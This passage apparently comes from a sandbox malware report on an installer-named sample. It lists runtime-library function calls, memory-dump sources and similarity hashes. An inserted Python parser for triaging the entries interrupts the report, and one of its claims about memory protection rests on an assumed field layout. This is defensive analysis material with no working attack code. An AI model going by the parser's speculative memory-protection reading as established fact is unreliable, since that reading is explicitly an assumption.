                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: 79fcfad50c0090ba16ebfdb9187e48057bd043ae26301419f9647726e2f41c69
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: 53717D30904259DFDB14DFA4C494BDDBBF0BF19308F2084A9D8656BB91CB74BA4ACB91
                            APIs
                            • _free.LIBCMT ref: 6C0D604D
                            • _free.LIBCMT ref: 6C0D6076
                            • SetEndOfFile.KERNEL32(00000000,6C0D4C5C,00000000,6C0CB640,?,?,?,?,?,?,?,6C0D4C5C,6C0CB640,00000000), ref: 6C0D60A8
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0D4C5C,6C0CB640,00000000,?,?,?,?,00000000,?), ref: 6C0D60C4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: 270c7d59e0b6f39c07208ee4fe15322468a40232f375dea3a04d527f446335d1
                            • Instruction ID: d64c8174540f7fc1ee035ef8048a4463b190242501fe81f39eacad88d517d5ed
                            • Opcode Fuzzy Hash: 270c7d59e0b6f39c07208ee4fe15322468a40232f375dea3a04d527f446335d1
                            • Instruction Fuzzy Hash: BA41A4B6601705AADB119BB5CC00BCF3BF9EF46324F260910E914E7B90EB75F8594721
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C10E41D
                              • Part of subcall function 6C10EE40: __EH_prolog.LIBCMT ref: 6C10EE45
                              • Part of subcall function 6C10E8EB: __EH_prolog.LIBCMT ref: 6C10E8F0
                              • Part of subcall function 6C10E593: __EH_prolog.LIBCMT ref: 6C10E598
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: 188bca7865e785992a3954b0742c8064af3387fbb22be301963891cfdb6cb4e1
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: B2216871E01248AECB09DBE5D994AEDBBF4AF19318F20406EE41277780DF781E08CB51
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0BF724,?,?,6C0BF7A5,?,?,?), ref: 6C0BF6AF
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0BF6C2
                            • FreeLibrary.KERNEL32(00000000,?,?,6C0BF724,?,?,6C0BF7A5,?,?,?), ref: 6C0BF6E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 9999a11638c653b20a2e4b8dc30209559a8836cc3a6b45b34994797a06dd14c7
                            • Instruction ID: db81c75245568156daba04a185d6b3213ad10eac99a31ab0973b3e1ea4224649
                            • Opcode Fuzzy Hash: 9999a11638c653b20a2e4b8dc30209559a8836cc3a6b45b34994797a06dd14c7
                            • Instruction Fuzzy Hash: 69F01C3AA4111AFBDF41ABD1C909B9E7BFCEB49759F104060E905B3560CF718A00EA94
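The function entries in this part of the report all share one shape: an APIs list (with "Part of subcall function" sub-bullets), a Memory Dump Source block naming the .sdmp region, and a Similarity block carrying the API ID, String ID, Opcode ID and fuzzy hashes. Most of them are compiler runtime code: the `GetModuleHandleExW("mscoree.dll")` / `GetProcAddress("CorExitProcess")` pair is the MSVC CRT's exit path, `CreateFileW("CONOUT$")` is its console initialisation, and the `__EH_prolog` / `std::_Lockit` entries are exception and locale scaffolding. The parser below is an added example, not Joe Sandbox code or any artefact of this sample: it turns the entries into records, drops functions whose calls never leave LIBCMT/LIBCPMT/LIBVCRUNTIME, collects the literal arguments (DLL names, export names, device paths) that remain, and deduplicates on Opcode ID. `SAMPLE` is constructed from entries on this page with abridged argument lists. The .sdmp field positions (process slot, base address, page protection) are an assumption about the dump naming convention, not something the report documents.

```python
"""Parse the per-function blocks of this report (APIs / Memory Dump Source /
Similarity) and separate C/C++ runtime boilerplate from functions that reach
real Win32 APIs.  Added example, not Joe Sandbox code.  SAMPLE is constructed
from entries on this page (argument lists abridged); the .sdmp field layout
(process slot, ..., base address, page protection) is an assumption."""
import re

RUNTIME_MODULES = {"LIBCMT", "LIBCPMT", "LIBVCRUNTIME"}   # MSVC CRT / STL attributions
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
                    r"(?P<name>.+?)\.(?P<module>[A-Z][A-Z0-9_]*)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"^Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-F]+), "
                       r"based on PE: (?P<pe>true|false)$")

SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0BF724), ref: 6C0BF6AF
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0BF6C2
• FreeLibrary.KERNEL32(00000000,?,?,6C0BF724), ref: 6C0BF6E5
Memory Dump Source
• Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Opcode ID: 9999a11638c653b20a2e4b8dc30209559a8836cc3a6b45b34994797a06dd14c7
APIs
• __EH_prolog.LIBCMT ref: 6C0FA6F1
  • Part of subcall function 6C109173: __EH_prolog.LIBCMT ref: 6C109178
Strings
Memory Dump Source
• Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
Similarity
• API ID: H_prolog
• String ID:
• Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
APIs
• WriteConsoleW.KERNEL32(00000000,?,6C0D4C5C,00000000,00000000), ref: 6C0D6441
  • Part of subcall function 6C0D647F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 6C0D6492
• ___initconout.LIBCMT ref: 6C0D645D
Memory Dump Source
• Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• Opcode ID: f7e5d65830ea764b033562e18d0bad274f2741123d30b9cb2d3da09e7a0cf1a3
"""


def describe_dump(name, offset):
    """Decode a .sdmp file name (field positions assumed, see module docstring)."""
    f = name.split(".")
    prot = int(f[4], 16)
    return {"proc": int(f[0], 16), "base": int(f[3], 16), "module_base": offset,
            "protect": PAGE_PROTECT.get(prot, hex(prot))}


def parse_entries(text):
    """One dict per function entry; an entry starts at each 'APIs' heading."""
    entries, entry, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # new function entry
            entry = {"apis": [], "meta": {}, "dump": None}
            entries.append(entry)
        if line in SECTIONS:
            section = line
            continue
        if entry is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs" and (m := API_RE.match(body)):
            entry["apis"].append(m.groupdict())
        elif section == "Memory Dump Source" and (m := SOURCE_RE.match(body)):
            entry["dump"] = describe_dump(m["dump"], int(m["offset"], 16))
        elif section == "Similarity":
            key, _, value = body.partition(":")
            entry["meta"][key.strip()] = value.strip()
    return entries


def classify(entry):
    """'runtime' when every call is CRT/STL, 'win32' when any reaches a real module, 'none' otherwise."""
    modules = {a["module"] for a in entry["apis"]}
    return "none" if not modules else "runtime" if modules <= RUNTIME_MODULES else "win32"


def literal_args(entry):
    """Non-numeric argument values (DLL names, export names, device paths) across the entry's calls."""
    found = []
    for a in entry["apis"]:
        for arg in (a["args"] or "").split(","):
            arg = arg.strip()
            if arg and arg != "?" and not re.fullmatch(r"[0-9A-F]+", arg):
                found.append(arg)
    return found


def triage(text):
    """Entries worth a human look: they reach Win32, deduplicated on Opcode ID."""
    seen, keep = set(), []
    for e in parse_entries(text):
        oid = e["meta"].get("Opcode ID")
        if classify(e) == "win32" and oid not in seen:
            seen.add(oid)
            keep.append(e)
    return keep
```

Run `triage()` over the whole function listing rather than the sample and the CRT entries (`H_prolog`, `_Lockit`, `_free`, `__dosmaperr`) fall away, leaving the calls that carry strings or touch files, consoles and handles. One caveat worth keeping in mind: if the protection field really is what the assumption says, the functions attributed to the 6C0E8000 region sit in PAGE_WRITECOPY memory rather than a normal executable section, which is itself a reason to look at that region before the rest.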
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6C0B789E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C0B78A9
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0B7917
                              • Part of subcall function 6C0B77A0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0B77B8
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6C0B78C4
                            • _Yarn.LIBCPMT ref: 6C0B78DA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: d031d156f9cf5ac10d321f9c0863fb7564c384e21c41198027bd9994f287f9e6
                            • Instruction ID: 045e53e8166f7910cdb0bfd5e42b6b06a0bb11418bcc768913e32a40af88f6d2
                            • Opcode Fuzzy Hash: d031d156f9cf5ac10d321f9c0863fb7564c384e21c41198027bd9994f287f9e6
                            • Instruction Fuzzy Hash: 40018FB56002159BDB06DF24C450BBC7BF1FF9A244B154049D81667780DF35BA06DFA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 17a516df9a4397cb5866e80fb125d2a54466ec350b57ca1530798b8b632e2aeb
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: 15127C70E16259DFCB04CFA4C590ADDBBB1BF09308F14946AE849ABB51DB34E945CFA0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: 9d7cc704bc56dfa6c368902460702cfe498fc9ca4b66c5c36e50273808a56d57
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 86B14CB1E00209DFCB14CF99C994AAEBBB5FF58314B60852EE415A7B50DB34AA45CF90
                            APIs
                              • Part of subcall function 6C0B7897: __EH_prolog3.LIBCMT ref: 6C0B789E
                              • Part of subcall function 6C0B7897: std::_Lockit::_Lockit.LIBCPMT ref: 6C0B78A9
                              • Part of subcall function 6C0B7897: std::locale::_Setgloballocale.LIBCPMT ref: 6C0B78C4
                              • Part of subcall function 6C0B7897: _Yarn.LIBCPMT ref: 6C0B78DA
                              • Part of subcall function 6C0B7897: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0B7917
                              • Part of subcall function 6BF82F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF82F95
                              • Part of subcall function 6BF82F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF82FAF
                              • Part of subcall function 6BF82F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF82FD0
                              • Part of subcall function 6BF82F60: __Getctype.LIBCPMT ref: 6BF83084
                              • Part of subcall function 6BF82F60: std::_Facet_Register.LIBCPMT ref: 6BF8309C
                              • Part of subcall function 6BF82F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF830B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6BF8211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: 5b1f4260668b307a97b6781ef1ac64a962c66ed9e0499984e3f53596712271c5
                            • Instruction ID: 42623fb53a2b893e5eb98eb5e400edb2b94678a387dea7e1c1290271d4801167
                            • Opcode Fuzzy Hash: 5b1f4260668b307a97b6781ef1ac64a962c66ed9e0499984e3f53596712271c5
                            • Instruction Fuzzy Hash: 1F4182B5E007098FDB00CF64D8457AABBF5FF48314F148268E919AB391E776A985CF90
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C114ECC
                              • Part of subcall function 6C0FF58A: __EH_prolog.LIBCMT ref: 6C0FF58F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: 67961f57f13f64a9abfe756378f46fac7e7c23f22cfb84ed7b52046305228ce9
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: 1621C9B0801B40CFC760CF6AC14428ABBF4BF29708B10895EC1AA97B11D7B8B508CF55
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C0CB640,6BF81DEA,00008000,6C0CB640,?,?,?,6C0CB1EF,6C0CB640,?,00000000,6BF81DEA), ref: 6C0CB339
                            • GetLastError.KERNEL32(?,?,?,6C0CB1EF,6C0CB640,?,00000000,6BF81DEA,?,6C0D4C0E,6C0CB640,000000FF,000000FF,00000002,00008000,6C0CB640), ref: 6C0CB343
                            • __dosmaperr.LIBCMT ref: 6C0CB34A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: 317075d6a94033a5d0f66432f7ae721bb45537282cf27c86b7ec47381322865a
                            • Instruction ID: 93908e84605635e2d5acbe3ed1e72d5e3e9f5f98f61f1816e934fcca880fd5e8
                            • Opcode Fuzzy Hash: 317075d6a94033a5d0f66432f7ae721bb45537282cf27c86b7ec47381322865a
                            • Instruction Fuzzy Hash: E101D837718615BBCF058FA9DC0499D3BBDDF86734B650208F82197690EE71E9418B61
                            APIs
                            • GetLastError.KERNEL32(?,?,?,6C0BF4D4,6C0E6DF0,0000000C), ref: 6C0C4F27
                            • _free.LIBCMT ref: 6C0C4F84
                            • _free.LIBCMT ref: 6C0C4FBA
                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C0BF4D4,6C0E6DF0,0000000C), ref: 6C0C4FC5
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 1e7e12d63033980b8985edd00b59a7a8bc165cec351f8f3a98bd1bd6d51b3550
                            • Instruction ID: eab4eb7e463d035e667aa248ba5a7116edb406267d46286a4989bd29636ce56d
                            • Opcode Fuzzy Hash: 1e7e12d63033980b8985edd00b59a7a8bc165cec351f8f3a98bd1bd6d51b3550
                            • Instruction Fuzzy Hash: 7C1123727042117B9B121AF88C80F6E22E9BBC637CB310628F12483BC0DF709C1B5212
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6C0D4C5C,00000000,00000000,?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640), ref: 6C0D6441
                            • GetLastError.KERNEL32(?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?,6C0CB640,?,6C0CC28C,6C0D6026), ref: 6C0D644D
                              • Part of subcall function 6C0D649E: CloseHandle.KERNEL32(FFFFFFFE,6C0D645D,?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?,6C0CB640), ref: 6C0D64AE
                            • ___initconout.LIBCMT ref: 6C0D645D
                              • Part of subcall function 6C0D647F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C0D641B,6C0D50AE,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?), ref: 6C0D6492
                            • WriteConsoleW.KERNEL32(00000000,?,6C0D4C5C,00000000,?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?), ref: 6C0D6472
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: f7e5d65830ea764b033562e18d0bad274f2741123d30b9cb2d3da09e7a0cf1a3
                            • Instruction ID: 5eda4a2dac03a8e02558c2c79822caa3fbda6cc4ead3d0031e45b199e47efa3a
                            • Opcode Fuzzy Hash: f7e5d65830ea764b033562e18d0bad274f2741123d30b9cb2d3da09e7a0cf1a3
                            • Instruction Fuzzy Hash: 23F01236140218BBCF621FD1DC04A8A3F76FF4A766F064450FA4886510DB32A8209FD0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 032260210fceff220f5a75fe8da93f679a2742e7e4c439bfebf9e6407249ab37
                            • Instruction ID: a543a460883d32903657eb9558ae4f9fad2261a02f5e633fa80ae8fbefd185fe
                            • Opcode Fuzzy Hash: 032260210fceff220f5a75fe8da93f679a2742e7e4c439bfebf9e6407249ab37
                            • Instruction Fuzzy Hash: FF71A475F113169BDB208F95C880BEEB7F9EF0D318F244219E82067A90D775D945C7A2
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C108C5D
                              • Part of subcall function 6C10761A: __EH_prolog.LIBCMT ref: 6C10761F
                              • Part of subcall function 6C107A2E: __EH_prolog.LIBCMT ref: 6C107A33
                              • Part of subcall function 6C108EA5: __EH_prolog.LIBCMT ref: 6C108EAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: 4990d455bec12654c4d3af9c5eabbf3283e91b256bd27fe6e6767ee95cb64635
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: BB815931E04148DFDB15DFA8D990BDDBBB4AF19318F1041AAE512A77A0DF30AE49CB61
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6BF82A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
